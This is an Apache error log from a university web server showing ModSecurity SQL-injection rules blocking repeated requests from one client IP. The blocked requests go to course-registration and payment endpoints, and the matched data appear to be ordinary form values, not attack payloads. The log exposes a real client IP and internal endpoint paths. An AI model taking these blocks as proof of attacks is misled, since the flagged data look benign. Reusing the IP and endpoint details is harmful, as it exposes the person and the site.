[Tue Aug 29 09:36:59.863088 2023] [:error] [pid 63693] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Zy8Co-f0AAPjNTPMAAAAo"]
[Tue Aug 29 09:36:59.863237 2023] [:error] [pid 63693] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1Zy8Co-f0AAPjNTPMAAAAo"]
[Tue Aug 29 09:37:14.301816 2023] [:error] [pid 63696] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_setuju. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_setuju: 20222x55201x-x41155050160181x15500211012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505212012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231423x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231431x-x553109x0x0x-xx;20222x55201x-x41155050160181x505232083x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21032x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21082x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF2112x-x553109x0x0x-xx;20222x55201x-x411..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_ [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1Z2sCo-f0AAPjQkF8AAAAA"]
[Tue Aug 29 09:37:44.098211 2023] [:error] [pid 63683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_setuju. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_setuju: 20222x55201x-x41155050160181x15500211012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505212012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231423x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231431x-x553109x0x0x-xx;20222x55201x-x41155050160181x505232083x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21032x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21082x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF2112x-x553109x0x0x-xx;20222x55201x-x411..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_ [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1Z@MCo-f0AAPjDJ5cAAAAe"]
[Tue Aug 29 09:37:59.884198 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1aB8Co-f0AAPgD0dUAAAAO"]
[Tue Aug 29 09:37:59.884281 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1aB8Co-f0AAPgD0dUAAAAO"]
[Tue Aug 29 09:38:15.639180 2023] [:error] [pid 63682] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aF8Co-f0AAPjC@jEAAAAd"]
[Tue Aug 29 09:38:16.152489 2023] [:error] [pid 63682] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aGMCo-f0AAPjC@jIAAAAd"]
[Tue Aug 29 09:38:17.003197 2023] [:error] [pid 63682] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aGMCo-f0AAPjC@jMAAAAd"]
[Tue Aug 29 09:38:18.713278 2023] [:error] [pid 63682] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aGsCo-f0AAPjC@jQAAAAd"]
[Tue Aug 29 09:38:37.465366 2023] [:error] [pid 63712] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_setuju. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_setuju: 20222x55201x-x41155050160181x15500211012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505212012x-x553109x0x0x-xx;20222x55201x82x41155050160181x505231423x551138x553109x0x0x-xx;20222x55201x82x41155050160181x505231431x551138x553109x0x0x-xx;20222x55201x-x41155050160181x505232083x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21032x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21082x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF2112x-x553109x0x0x-xx;20222..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_ [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1aLcCo-f0AAPjgw30AAAAC"]
[Tue Aug 29 09:38:39.585228 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aL8Co-f0AAPjinbMAAAAF"]
[Tue Aug 29 09:38:42.564149 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aMsCo-f0AAPjinbQAAAAF"]
[Tue Aug 29 09:38:43.231444 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aM8Co-f0AAPjinbUAAAAF"]
[Tue Aug 29 09:38:43.738918 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aM8Co-f0AAPjinbYAAAAF"]
[Tue Aug 29 09:38:43.931784 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aM8Co-f0AAPjinbcAAAAF"]
[Tue Aug 29 09:38:44.123200 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinbgAAAAF"]
[Tue Aug 29 09:38:44.299516 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinbkAAAAF"]
[Tue Aug 29 09:38:44.465023 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinboAAAAF"]
[Tue Aug 29 09:38:44.627078 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinbsAAAAF"]
[Tue Aug 29 09:38:44.804430 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinbwAAAAF"]
[Tue Aug 29 09:38:44.971848 2023] [:error] [pid 63714] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1aNMCo-f0AAPjinb0AAAAF"]
